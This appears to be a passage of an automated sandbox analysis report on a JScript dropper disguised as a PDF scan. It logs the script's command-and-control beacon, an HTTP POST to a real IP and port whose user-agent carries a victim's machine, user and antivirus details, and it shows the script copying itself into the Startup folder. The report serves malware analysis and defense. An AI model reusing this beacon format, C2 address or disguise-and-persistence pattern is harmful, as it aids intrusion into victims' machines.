      1192.168.2.75939091.92.243.3993341916C:\Windows\System32\wscript.exe
      TimestampBytes transferredDirectionData
      Oct 15, 2024 16:41:02.478816032 CEST329OUTPOST /is-ready HTTP/1.1
      Accept: */*
      user-agent: B81A4609<|>user-PC<|>user<|>Microsoft Windows 10 Pro<|>Plus<|>Windows Defender .<|>false - 15/10/2024
      Accept-Language: en-ch
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      Host: 91.92.243.39:9334
      Content-Length: 0
      Connection: Keep-Alive
      Cache-Control: no-cache


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:1
      Start time:10:38:54
      Start date:15/10/2024
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Revised-SOP_MCA_pdf.js"
      Imagebase:0x7ff644040000
      File size:170'496 bytes
      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:10
      Start time:12:24:21
      Start date:15/10/2024
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"
      Imagebase:0x7ff644040000
      File size:170'496 bytes
      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      Target ID:12
      Start time:12:24:36
      Start date:15/10/2024
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"
      Imagebase:0x7ff644040000
      File size:170'496 bytes
      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:13
      Start time:12:24:44
      Start date:15/10/2024
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"
      Imagebase:0x7ff644040000
      File size:170'496 bytes
      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:16
      Start time:12:24:52
      Start date:15/10/2024
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan_Revised-SOP_MCA_pdf.js"
      Imagebase:0x7ff644040000
      File size:170'496 bytes
      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      No disassembly